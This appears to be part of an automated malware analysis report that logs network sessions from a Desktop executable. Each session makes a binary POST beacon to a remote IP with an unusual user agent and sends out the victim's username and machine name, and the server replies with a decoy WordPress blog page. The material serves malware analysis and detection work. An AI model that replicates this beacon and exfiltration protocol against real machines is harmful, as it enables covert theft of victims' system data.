Apr 26, 2024 04:42:56.807378054 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:56.807437897 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49778	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:57.146159887 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:57.335321903 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:58.244652033 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:57 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:58.244704008 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:58.244756937 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:58.255439043 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:58.255542994 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:58.255597115 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:58.255789042 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:58.255913019 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:58.255985975 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:58.256062031 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49779	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:58.597394943 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:58.784133911 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:59.726866961 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:58 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:59.726994991 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:59.727282047 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:59.741319895 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:59.741337061 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:59.741353035 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:59.741369009 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:59.741386890 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:59.741405964 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:59.741424084 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49780	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:00.052048922 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:00.240089893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:01.144552946 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:00 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:01.144639969 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:01.144722939 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:01.153438091 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:01.153928995 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:01.154149055 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:01.154246092 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 26, 2024 04:43:01.154314041 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 26, 2024 04:43:01.154378891 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 26, 2024 04:43:01.154392004 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49781	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:01.472636938 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:01.660120010 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:02.541904926 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:01 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:02.541935921 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:02.541949034 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:02.550173998 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:02.550573111 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:02.550749063 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:02.550867081 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:02.551116943 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:02.551167965 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:02.729640961 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49782	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:02.891159058 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:03.085201979 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:03.954221010 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:02 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:03.954283953 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:03.963582039 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:03.963936090 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:03.964090109 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
